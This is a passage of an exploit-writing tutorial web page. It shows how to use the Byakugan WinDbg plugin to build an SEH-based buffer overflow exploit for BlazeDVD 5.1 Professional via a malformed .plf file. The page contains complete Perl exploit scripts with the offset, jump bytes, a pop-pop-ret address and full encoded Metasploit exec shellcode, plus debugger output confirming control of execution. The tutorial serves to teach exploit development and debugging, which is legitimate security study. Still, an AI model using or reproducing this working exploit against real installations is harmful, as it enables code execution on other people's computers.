In the first parts of this exploit writing tutorial, I have mainly used Windbg as a tool to watch registers and stack contents while evaluating crashes and building exploits. Today, I will discuss some other debuggers and debugger plugins that will help you speed up this process. A typical exploit writing toolkit arsenal should at least contain the following tools : <\/p>\n
In the previous chapters, we have already played with windbg, and I have briefly discussed a windbg extension \/ plugin from Microsoft, which will evaluate crashes and will tell you if they think the crash is exploitable or not.\u00a0 This plugin (MSEC) can be downloaded from http:\/\/www.codeplex.com\/msecdbg<\/a>. While MSEC can be handy to give you a first impression, don\u2019t rely on it too much. It\u2019s always better to manually look at registers, stack values, and try to see if a vulnerability can lead to code execution or not. <\/p>\n Everybody knows that ollydbg has numerous plugins (I\u2019ll talk about these plugins later). Windbg also has a framework\/API for building plugins\/extension.\u00a0 MSEC was just one example\u2026\u00a0 Metasploit has built & released their own windbg plugin about a year ago<\/a>, called byakugan. Pre-compiled binaries for WIndows XP SP2, SP3, Vista and Windows 7 can be found in the framework3 folder (get latest trunk via svn), under\u00a0 \\external\\source\\byakugan\\bin Place byakugan.dll and injectsu.dll under the windbg application folder (not under winext !), and put detoured.dll under c:\\windows\\system32 What can you do with byakugan.dll<\/span> ? <\/p>\n Injectsu.dll<\/span> handles hooking of API functions in the target process.\u00a0 It creates a back-channel-information-gathering-thread which connects to the debugger. Detoured.dll<\/span> is a Microsoft Research hooking library, and handles trampoline code, keeps track of hooked functions and provides auto fix-ups on function trampolines. Today, I will only look at byakugan, more specifically the jutsu component (because I can use techniques explained in the first parts of this tutorial series to demonstrate the features of that component) and pattern_offset. You can load the byakugan module in windbg using the following command : <\/p>\n The jutsu component offers the following functions : <\/p>\n In addition to jutsu, there\u2019s pattern_offset, which allows you to find a metasploit pattern in memory and shows the offset to eip In order to demonstrate how byakugan can speed up the exploit development process, we\u2019ll use a vulnerability found in BlazeDVD 5.1 Professional\/Blaze HDTV Player 6.0<\/a>, where a malformed plf file leads to a stack buffer overflow. We\u2019ll try to build a working exploit with only one crash \ud83d\ude42 Get yourself a copy of BlazeDVD 5 Professional from http:\/\/www.blazevideo.com\/download.htm<\/a> A local copy of this vulnerable application can be downloaded here : <\/p>\n [download id=40]<\/p><\/blockquote>\n Usually, we would start with building a payload that contains lots of A\u2019s. But this time we will use a metasploit pattern right away. Create a metasploit pattern that contains 1000 characters and save the pattern in a file (e.g. blazecrash.plf) : <\/p>\n Launch windbg, and execute blazedvd from within windbg. (This will make sure that, if the application crashes, windbg will catch it).\u00a0\u00a0 Push the application out of the breakpoint (you may have to press F5 a couple of times (about 27 times on my system) to launch the application).\u00a0 When blazeDVD is launched, open the plf file (which only contains the metasploit pattern). When the application dies, press F5 again. You should get something like this : <\/p>\n Now it\u2019s time to use byakugan. Load the byakugan module and see if it can find the metasploit pattern somewhere : <\/p>\n Cool. Not only have we validated the buffer overflow, but we alo know the offset, all in one run. It looks like we have overwritten RET\u2026\u00a0 but before concluding that this is a plain RET overwrite, always run !exchain, just to verify. <\/p>\n It\u2019s SEH based. The offset shown (612) is the offset to nSEH. So in order to overwrite next SEH, we need to subtract 4 bytes to get the real offset. (= 608) We know that a typical SEH based exploit looks like this : [junk][jump][pop pop ret][shellcode] Let\u2019s find a pop pop ret, and we\u2019ll <\/p>\n Find pop pop ret :\u00a0 You can still use findjmp, or you can use !jutsu searchOpcode. The only drawback with !jutsu searchOpcode is that you\u2019ll have to specify the registers (with findjmp, you\u2019ll get all pop pop ret combinations).\u00a0 But let\u2019s use searchOpcode anyway. We\u2019ll look for pop esi, pop ebx, ret <\/p>\n <\/p>\n Look for addresses in the address range of one of the executable modules \/ dll\u2019s from BlazeDVD. (you can get the list of executable modules with windbg\u2019s \u201clm\u201d command). On my system (XP SP3 En), addresses starting with 0x64 will work fine. We\u2019ll use 0x640246f7 <\/p>\n Let\u2019s build our exploit : <\/p>\n Try it - works fine on my system. This was a pretty straigthforward example.. and perhaps we got lucky this time, because there are a number of drawbacks when building an exploit almost blindly, purely based on the output of the byakugan features : <\/p>\n But still, if it works, then you have saved yourself a lot of time <\/p>\n Let\u2019s use the same vulnerability\/exploit to discuss some of the other features of byakugan. We\u2019ll use the same sploit, but instead of doing the jump (0xeb,0x1e), we\u2019ll put in 2 breakpoints (0xcc,0xcc), so we can observe if our original shellcode matches with what we have put in memory (so we can identify shellcode corruption and possible bad characters). First, we will simply compare the shellcode in memory with the original shellcode, and, to demonstrate the diff functionalities, we\u2019ll modify the shellcode (so we can see the differences) We need to put the shellcode in a text file (not in ascii, but write the bytes\/binary to the text file) : <\/p>\n Open windbg, run the executable and open the newly created exploit file. When the application dies, give it a F5 so it would step over the first chance exception. The application now stops at our breakpoints, as expected <\/p>\n Dump eip to get the address where the shellcode starts : <\/p>\n Shellcode starts at 0x0012f5de. Let\u2019s run jutsu <\/p>\n The parameters that were provided to memDiff are <\/p>\n The windbg output did not show any bold characters, so we have an identical match (as expected). Now modify the exploit script and change some random shellcode bytes, and do the exercise again. (I have replaced all x43\u2019s with x44 - 24 replacements in total) <\/p>\n Now we see 24 bytes in bold (which corresponds with the 24 bytes that were change in the exploit script).\u00a0 This is a good way to determine whether shellcode (or ascii patterns or metasploit patterns) were changed in memory.\u00a0\u00a0 You can also see the \u201cBytes replaced\u201d. Compare the line of bytes with the line that was printed out in the first test.\u00a0 We now see 0x43 added to the list (which is exactly the byte that was changed in my shellcode)\u2026\u00a0 Way to go byakugan !\u00a0 High five again ! memDiff can really save you lots of time when you need to compare shellcode and find bad characters\u2026 Note : memDiff types are parameters : <\/p>\n <\/p>\n These 3 jutsu functions will help you finding buffer locations in memory. Let\u2019s assume the following script : <\/p>\n <\/p>\n Note : \u201cmy $junk\u201d contains a metasploit pattern of 608 characters. (so you\u2019ll have to create it yourself and paste it in the script - it was too long to put it on this page).\u00a0 nseh contains breakpoints.\u00a0 And finally, at the bottom of the script, the nops + shellcode are written to a file (c:\\shell.txt).<\/p><\/blockquote>\n Open windbg, launch blazeDVD, open the sploit file (which should make the application die). First change exception : <\/p>\n Now create 2 identBuf definitions : one for the metasploit pattern, and one for the shellcode : <\/p>\n Let byakugan hunt for these buffers : <\/p>\n As seen earlier in this post, we could overwrite EIP directly (but we have chosen to go for a SEH based exploit).\u00a0 Hunt tells us that we control eip at offset 260. So hunt will give us the same results as !pattern_offset. On top of that, hunt will look for our pre-identified buffers and give us the addresses.\u00a0 I have asked Lurene Grenier if she could display the offset to a register if this output (which would make it even easier to find your buffers\u2026 she told me that she will think of building a generic solution for this - to be continued\u2026) Press \u201cg\u201d in windbg (to pass the first chance exception to the application). The application now breaks at our breakpoints (which where placed at nseh) <\/p>\n Run \u2018hunt\u2019 again : <\/p>\n We no longer control eip directly via myBuffer (because we have passed on the first exception to the application), but if we look at eip (0x0012f5b8) , we can see it points to a location that is very close to buffer myShell (0x0012f5c0)\u00a0 (so a short jump would make the application jump to the shellcode. <\/p>\n This proves that, since our breakpoint is placed at the first byte of where nseh is overwritten, a jump of 8 bytes (- 2 bytes of code to make the jump itself) will make the app flow jump to our shellcode. <\/p>\n We have seen that we can also build an exploit based on direct RET overwrite (at offset 260).\u00a0 Let\u2019s build a script that will demonstrate the use of findReturn help us building a working exploit : First, write a script that will build a payload made up of 264 metasploit pattern characters, followed by 1000 A\u2019s : <\/p>\n When opening the sploitfile, windbg reports this : <\/p>\n Let\u2019s use the byakugan arsenal to find all required information to build a working exploit : <\/p>\nByakugan : introduction, pattern_offset and searchOpcode<\/h3>\n
\n
0:000> !load byakugan<\/span><\/strong> [Byakugan] Successfully loaded!<\/pre>\n\n
peter@sploitbuilder1 ~\/framework-3.2\/tools $ .\/pattern_create.rb 1000 > blazecrash.plf<\/pre>\n
(5b0.894): Access violation(5b0.894): Access violation - code c0000005 (first chance) - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=77f6c19c ecx=062ddcd8 edx=00000042 esi=01f61c20 edi=6405569c eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc<\/pre>\n
0:000> !load byakugan<\/span><\/strong> [Byakugan] Successfully loaded! 0:000> !pattern_offset 1000<\/span><\/strong> [Byakugan] Control of ecx at offset<\/span> 612. [Byakugan] Control of eip at offset<\/span> 612.<\/pre>\n0:000> !exchain<\/span><\/strong> 0012afe4: 0012afe4: ntdll!ExecuteHandler2+3a (7c9032bc) ntdll!ExecuteHandler2+3a (7c9032bc) 0012f5b8: 0012f5b8: <Unloaded_ionInfo.dll>+41347540 (41347541) <Unloaded_ionInfo.dll>+41347540 (41347541) Invalid exception stack at 33754132<\/pre>\n\n
0:000> !jutsu searchOpcode pop<\/span> esi | pop<\/span> ebx | ret<\/span><\/strong> [J] Searching for: > pop<\/span> esi > pop<\/span> ebx > ret [J] Machine Code: > 5e 5b c3 [J] Executable opcode sequence found at: 0x05942a99 [J] Executable opcode sequence found at: 0x05945425 [J] Executable opcode sequence found at: 0x05946a1e [J] Executable opcode sequence found at: 0x059686a0 [J] Executable opcode sequence found at: 0x05969d91 [J] Executable opcode sequence found at: 0x0596aaa6 [J] Executable opcode sequence found at: 0x1000467f [J] Executable opcode sequence found at: 0x100064c7 [J] Executable opcode sequence found at: 0x10008795 [J] Executable opcode sequence found at: 0x1000aa0b [J] Executable opcode sequence found at: 0x1000e662 [J] Executable opcode sequence found at: 0x1000e936 [J] Executable opcode sequence found at: 0x3d937a1d [J] Executable opcode sequence found at: 0x3d93adf5<\/pre>\n\u2026 (etc)<\/pre>\n
0:000> u 0x640246f7 MediaPlayerCtrl!DllCreateObject+0x153e7: 640246f7 5e pop<\/span> esi 640246f8 5b pop<\/span> ebx 640246f9 c3 ret<\/pre>\nmy<\/span> $sploitfile=\"blazesploit.plf<\/span>\"; my<\/span> $junk = \"A<\/span>\" x 608; #612 - 4 my<\/span> $nseh = \"\\xeb\\x1e\\x90\\x90<\/span>\"; #jump 30 bytes my<\/span> $seh = pack<\/span>('V',0x640246f7); #pop<\/span> esi, pop<\/span> ebx, ret my<\/span> $nop = \"\\x90<\/span>\" x 30; #start with 30 nop's # windows\/exec<\/span> - 302 bytes # http:\/\/www.metasploit.com<\/span> # Encoder: x86\/alpha_upper # EXITFUNC=seh, CMD=calc my<\/span> $shellcode=\"\\x89\\xe3\\xdb\\xc2\\xd9\\x73\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x43<\/span>\" . \"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58<\/span>\" . \"\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\" . \"\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30<\/span>\" . \"\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4b\\x58<\/span>\" . \"\\x51\\x54\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47\\x4c<\/span>\" . \"\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x44\\x38\\x43\\x31\\x4a\\x4f\\x4c\\x4b<\/span>\" . \"\\x50\\x4f\\x44\\x58\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x45\\x51\\x4a\\x4b<\/span>\" . \"\\x50\\x49\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x45\\x51\\x4a\\x4e\\x50\\x31<\/span>\" . \"\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x44\\x34\\x45\\x57<\/span>\" . \"\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4b\\x44<\/span>\" . \"\\x47\\x4b\\x50\\x54\\x47\\x54\\x45\\x54\\x43\\x45\\x4a\\x45\\x4c\\x4b<\/span>\" . \"\\x51\\x4f\\x46\\x44\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\\x4c<\/span>\" . \"\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\\x4b<\/span>\" . \"\\x45\\x4c\\x4c\\x4b\\x43\\x31\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x46\\x44<\/span>\" . \"\\x43\\x34\\x49\\x53\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x46\\x36<\/span>\" . \"\\x45\\x34\\x4c\\x4b\\x50\\x46\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\\x4c<\/span>\" . \"\\x4c\\x4b\\x42\\x50\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x42\\x48\\x43\\x38<\/span>\" . \"\\x4b\\x39\\x4a\\x58\\x4d\\x53\\x49\\x50\\x43\\x5a\\x50\\x50\\x43\\x58<\/span>\" . \"\\x4c\\x30\\x4d\\x5a\\x45\\x54\\x51\\x4f\\x42\\x48\\x4d\\x48\\x4b\\x4e<\/span>\" . \"\\x4d\\x5a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4b\\x57\\x43\\x53\\x43\\x51<\/span>\" . \"\\x42\\x4c\\x43\\x53\\x43\\x30\\x41\\x41<\/span>\"; $payload =$junk.$nseh.$seh.$nop.$shellcode; open<\/span> ($FILE,\">$sploitfile<\/span>\"); print<\/span> $FILE $payload; close<\/span>($FILE);<\/pre>\n\n
Byakugan : memDiff<\/h3>\n
my<\/span> $shellcode=\"\\x89\\xe3\\xdb\\xc2\\xd9\\x73\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x43<\/span>\" . \"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58<\/span>\" . \"\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\" . \"\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30<\/span>\" . \"\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4b\\x58<\/span>\" . \"\\x51\\x54\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47\\x4c<\/span>\" . \"\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x44\\x38\\x43\\x31\\x4a\\x4f\\x4c\\x4b<\/span>\" . \"\\x50\\x4f\\x44\\x58\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x45\\x51\\x4a\\x4b<\/span>\" . \"\\x50\\x49\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x45\\x51\\x4a\\x4e\\x50\\x31<\/span>\" . \"\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x44\\x34\\x45\\x57<\/span>\" . \"\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4b\\x44<\/span>\" . \"\\x47\\x4b\\x50\\x54\\x47\\x54\\x45\\x54\\x43\\x45\\x4a\\x45\\x4c\\x4b<\/span>\" . \"\\x51\\x4f\\x46\\x44\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\\x4c<\/span>\" . \"\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\\x4b<\/span>\" . \"\\x45\\x4c\\x4c\\x4b\\x43\\x31\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x46\\x44<\/span>\" . \"\\x43\\x34\\x49\\x53\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x46\\x36<\/span>\" . \"\\x45\\x34\\x4c\\x4b\\x50\\x46\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\\x4c<\/span>\" . \"\\x4c\\x4b\\x42\\x50\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x42\\x48\\x43\\x38<\/span>\" . \"\\x4b\\x39\\x4a\\x58\\x4d\\x53\\x49\\x50\\x43\\x5a\\x50\\x50\\x43\\x58<\/span>\" . \"\\x4c\\x30\\x4d\\x5a\\x45\\x54\\x51\\x4f\\x42\\x48\\x4d\\x48\\x4b\\x4e<\/span>\" . \"\\x4d\\x5a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4b\\x57\\x43\\x53\\x43\\x51<\/span>\" . \"\\x42\\x4c\\x43\\x53\\x43\\x30\\x41\\x41<\/span>\"; open<\/span> ($FILE2,\">shell.txt<\/span>\"); print<\/span> $FILE2 $shellcode; close<\/span>($FILE2);<\/pre>\n(744.7a8): Break instruction exception(744.7a8): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=0012f188 ecx=640246f7 edx=7c9032bc esi=7c9032a8 edi=00000000 eip=0012f5b8 esp=0012f0ac ebp=0012f0c0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 <Unloaded_ionInfo.dll>+0x12f5b7: 0012f5b8 cc int<\/span> 3<\/pre>\n0:000> d eip 0012f5b8 cc cc 90 90 f7 46 02 64-90 90 90 90 90 90 90 90 .....F.d........ 0012f5c8 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................ 0012f5d8 90 90 90 90 90 90 89 e3-db c2 d9 73 f4 59 49 49 ...........s.YII 0012f5e8 49 49 49 43 43 43 43 43-43 51 5a 56 54 58 33 30 IIICCCCCCQZVTX30 0012f5f8 56 58 34 41 50 30 41 33-48 48 30 41 30 30 41 42 VX4AP0A3HH0A00AB 0012f608 41 41 42 54 41 41 51 32-41 42 32 42 42 30 42 42 AABTAAQ2AB2BB0BB 0012f618 58 50 38 41 43 4a 4a 49-4b 4c 4b 58 51 54 43 30 XP8ACJJIKLKXQTC0 0012f628 bb 50 bb 50 4c 4b 47 35-47 4c 4c 4b 43 4c 43 35 .P.PLKG5GLLKCLC5<\/pre>\n
0:000> !load byakugan<\/span><\/strong> [Byakugan] Successfully loaded! 0:000> !jutsu memDiff file 302 c:\\sploits\\blazevideo\\shell.txt 0x0012f5de<\/span><\/strong> ACTUAL EXPECTED ffffff89 ffffffe3 ffffffdb ffffffc2 ffffffd9 73 fffffff4 59 49 49 49 49 49 43 43 43 ffffff89 ffffffe3 ffffffdb ffffffc2 ffffffd9 73 fffffff4 59 49 49 49 49 49 43 43 43 43 43 43 51 5a 56 54 58 33 30 56 58 34 41 50 30 43 43 43 51 5a 56 54 58 33 30 56 58 34 41 50 30 41 33 48 48 30 41 30 30 41 42 41 41 42 54 41 41 41 33 48 48 30 41 30 30 41 42 41 41 42 54 41 41 51 32 41 42 32 42 42 30 42 42 58 50 38 41 43 4a 51 32 41 42 32 42 42 30 42 42 58 50 38 41 43 4a 4a 49 4b 4c 4b 58 51 54 43 30 45 50 45 50 4c 4b 4a 49 4b 4c 4b 58 51 54 43 30 45 50 45 50 4c 4b 47 35 47 4c 4c 4b 43 4c 43 35 44 38 43 31 4a 4f 47 35 47 4c 4c 4b 43 4c 43 35 44 38 43 31 4a 4f 4c 4b 50 4f 44 58 4c 4b 51 4f 47 50 45 51 4a 4b 4c 4b 50 4f 44 58 4c 4b 51 4f 47 50 45 51 4a 4b 50 49 4c 4b 46 54 4c 4b 45 51 4a 4e 50 31 49 50 50 49 4c 4b 46 54 4c 4b 45 51 4a 4e 50 31 49 50 4c 59 4e 4c 4c 44 49 50 44 34 45 57 49 51 49 5a 4c 59 4e 4c 4c 44 49 50 44 34 45 57 49 51 49 5a 44 4d 43 31 49 52 4a 4b 4b 44 47 4b 50 54 47 54 44 4d 43 31 49 52 4a 4b 4b 44 47 4b 50 54 47 54 45 54 43 45 4a 45 4c 4b 51 4f 46 44 45 51 4a 4b 45 54 43 45 4a 45 4c 4b 51 4f 46 44 45 51 4a 4b 45 36 4c 4b 44 4c 50 4b 4c 4b 51 4f 45 4c 43 31 45 36 4c 4b 44 4c 50 4b 4c 4b 51 4f 45 4c 43 31 4a 4b 4c 4b 45 4c 4c 4b 43 31 4a 4b 4d 59 51 4c 4a 4b 4c 4b 45 4c 4c 4b 43 31 4a 4b 4d 59 51 4c 46 44 43 34 49 53 51 4f 46 51 4b 46 43 50 46 36 46 44 43 34 49 53 51 4f 46 51 4b 46 43 50 46 36 45 34 4c 4b 50 46 50 30 4c 4b 51 50 44 4c 4c 4b 45 34 4c 4b 50 46 50 30 4c 4b 51 50 44 4c 4c 4b 42 50 45 4c 4e 4d 4c 4b 42 48 43 38 4b 39 4a 58 42 50 45 4c 4e 4d 4c 4b 42 48 43 38 4b 39 4a 58 4d 53 49 50 43 5a 50 50 43 58 4c 30 4d 5a 45 54 4d 53 49 50 43 5a 50 50 43 58 4c 30 4d 5a 45 54 51 4f 42 48 4d 48 4b 4e 4d 5a 44 4e 50 57 4b 4f 51 4f 42 48 4d 48 4b 4e 4d 5a 44 4e 50 57 4b 4f 4b 57 43 53 43 51 42 4c 43 53 43 30 41 41 4b 57 43 53 43 51 42 4c 43 53 43 30 41 41 [J] Bytes replaced: 0x89 0xe3 0xdb 0xc2 0xd9 0xf4 [J] Offset corruption occurs at:<\/pre>\n\n
0:000> !load byakugan [Byakugan] Successfully loaded! 0:000> !jutsu memDiff file 302 c:\\sploits\\blazevideo\\shell.txt 0x0012f5de<\/span><\/strong> ACTUAL EXPECTED ffffff89 ffffffe3 ffffffdb ffffffc2 ffffffd9 73 fffffff4 59 49 49 49 49 49 44 44 44 ffffff89 ffffffe3 ffffffdb ffffffc2 ffffffd9 73 fffffff4 59 49 49 49 49 49 43 43 43 44 44 44 51 5a 56 54 58 33 30 56 58 34 41 50 30 43 43 43 51 5a 56 54 58 33 30 56 58 34 41 50 30 41 33 48 48 30 41 30 30 41 42 41 41 42 54 41 41 41 33 48 48 30 41 30 30 41 42 41 41 42 54 41 41 51 32 41 42 32 42 42 30 42 42 58 50 38 41 44 4a 51 32 41 42 32 42 42 30 42 42 58 50 38 41 43 4a 4a 49 4b 4c 4b 58 51 54 44 30 45 50 45 50 4c 4b 4a 49 4b 4c 4b 58 51 54 43 30 45 50 45 50 4c 4b 47 35 47 4c 4c 4b 44 4c 44 35 44 38 44 31 4a 4f 47 35 47 4c 4c 4b 43 4c 43 35 44 38 43 31 4a 4f 4c 4b 50 4f 44 58 4c 4b 51 4f 47 50 45 51 4a 4b 4c 4b 50 4f 44 58 4c 4b 51 4f 47 50 45 51 4a 4b 50 49 4c 4b 46 54 4c 4b 45 51 4a 4e 50 31 49 50 50 49 4c 4b 46 54 4c 4b 45 51 4a 4e 50 31 49 50 4c 59 4e 4c 4c 44 49 50 44 34 45 57 49 51 49 5a 4c 59 4e 4c 4c 44 49 50 44 34 45 57 49 51 49 5a 44 4d 44 31 49 52 4a 4b 4b 44 47 4b 50 54 47 54 44 4d 43 31 49 52 4a 4b 4b 44 47 4b 50 54 47 54 45 54 44 45 4a 45 4c 4b 51 4f 46 44 45 51 4a 4b 45 54 43 45 4a 45 4c 4b 51 4f 46 44 45 51 4a 4b 45 36 4c 4b 44 4c 50 4b 4c 4b 51 4f 45 4c 44 31 45 36 4c 4b 44 4c 50 4b 4c 4b 51 4f 45 4c 43 31 4a 4b 4c 4b 45 4c 4c 4b 44 31 4a 4b 4d 59 51 4c 4a 4b 4c 4b 45 4c 4c 4b 43 31 4a 4b 4d 59 51 4c 46 44 44 34 49 53 51 4f 46 51 4b 46 44 50 46 36 46 44 43 34 49 53 51 4f 46 51 4b 46 43 50 46 36 45 34 4c 4b 50 46 50 30 4c 4b 51 50 44 4c 4c 4b 45 34 4c 4b 50 46 50 30 4c 4b 51 50 44 4c 4c 4b 42 50 45 4c 4e 4d 4c 4b 42 48 44 38 4b 39 4a 58 42 50 45 4c 4e 4d 4c 4b 42 48 43 38 4b 39 4a 58 4d 53 49 50 44 5a 50 50 44 58 4c 30 4d 5a 45 54 4d 53 49 50 43 5a 50 50 43 58 4c 30 4d 5a 45 54 51 4f 42 48 4d 48 4b 4e 4d 5a 44 4e 50 57 4b 4f 51 4f 42 48 4d 48 4b 4e 4d 5a 44 4e 50 57 4b 4f 4b 57 44 53 44 51 42 4c 44 53 44 30 41 41 4b 57 43 53 43 51 42 4c 43 53 43 30 41 41 [J] Bytes replaced: 0x89 0xe3 0xdb 0xc2 0xd9 0xf4 0x43 [J] Offset corruption occurs at:<\/pre>\n0:000> !jutsu memDiff [J] Format: memDiff <type> <size> <value<\/span>> <address> Valid Types: hex<\/span>: Value is any hex<\/span> characters file: Buffer is read<\/span> in from file at path <value<\/span>> buf: Buffer is taken from known tracked Buffers<\/pre>\nByakugan : identBuf\/listBuf\/rmBuf and hunt<\/h3>\n
my<\/span> $sploitfile=\"blazesploit.plf<\/span>\"; my<\/span> $junk = \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab\u2026<\/span>\"; my<\/span> $nseh = \"\\xcc\\xcc\\x90\\x90<\/span>\"; #jump 30 bytes my<\/span> $seh = pack<\/span>('V',0x640246f7); #pop<\/span> esi, pop<\/span> ebx, ret my<\/span> $nop = \"\\x90<\/span>\" x 30; #start with 30 nop's # windows\/exec<\/span> - 302 bytes # http:\/\/www.metasploit.com<\/span> # Encoder: x86\/alpha_upper # EXITFUNC=seh, CMD=calc my<\/span> $shellcode=\"\\x89\\xe3\\xdb\\xc2\\xd9\\x73\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x43<\/span>\" . \"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58<\/span>\" . \"\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\" . \"\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30<\/span>\" . \"\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4b\\x58<\/span>\" . \"\\x51\\x54\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47\\x4c<\/span>\" . \"\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x44\\x38\\x43\\x31\\x4a\\x4f\\x4c\\x4b<\/span>\" . \"\\x50\\x4f\\x44\\x58\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x45\\x51\\x4a\\x4b<\/span>\" . \"\\x50\\x49\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x45\\x51\\x4a\\x4e\\x50\\x31<\/span>\" . \"\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x44\\x34\\x45\\x57<\/span>\" . \"\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4b\\x44<\/span>\" . \"\\x47\\x4b\\x50\\x54\\x47\\x54\\x45\\x54\\x43\\x45\\x4a\\x45\\x4c\\x4b<\/span>\" . \"\\x51\\x4f\\x46\\x44\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\\x4c<\/span>\" . \"\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\\x4b<\/span>\" . \"\\x45\\x4c\\x4c\\x4b\\x43\\x31\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x46\\x44<\/span>\" . \"\\x43\\x34\\x49\\x53\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x46\\x36<\/span>\" . \"\\x45\\x34\\x4c\\x4b\\x50\\x46\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\\x4c<\/span>\" . \"\\x4c\\x4b\\x42\\x50\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x42\\x48\\x43\\x38<\/span>\" . \"\\x4b\\x39\\x4a\\x58\\x4d\\x53\\x49\\x50\\x43\\x5a\\x50\\x50\\x43\\x58<\/span>\" . \"\\x4c\\x30\\x4d\\x5a\\x45\\x54\\x51\\x4f\\x42\\x48\\x4d\\x48\\x4b\\x4e<\/span>\" . \"\\x4d\\x5a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4b\\x57\\x43\\x53\\x43\\x51<\/span>\" . \"\\x42\\x4c\\x43\\x53\\x43\\x30\\x41\\x41<\/span>\"; $payload =$junk.$nseh.$seh.$nop.$shellcode; open<\/span> ($FILE,\">$sploitfile<\/span>\"); print<\/span> $FILE $payload; close<\/span>($FILE); open<\/span> ($FILE2,\">c:\\\\shell.txt<\/span>\"); print<\/span> $FILE2 $nop.$shellcode; close<\/span>($FILE2);<\/pre>\n(d54.970): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569c eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 <Unloaded_ionInfo.dll>+0x37694135: 37694136 ?? ???<\/pre>\n
0:000> !load byakugan<\/strong> [Byakugan] Successfully loaded! 0:000> !jutsu identBuf file myShell c:\\shell.txt<\/strong> [J] Creating buffer myShell. 0:000> !jutsu identBuf msfpattern myBuffer 608<\/strong> [J] Creating buffer myBuffer. 0:000> !jutsu listBuf<\/strong> [J] Currently tracked buffer patterns: Buf: myShell Pattern: \u00e3\u00db\u00c2\u00d9s\u00f4YIIIIICCCCCCQZVT... Buf: myBuffer Pattern: Aa0Aa1A...<\/pre>\n
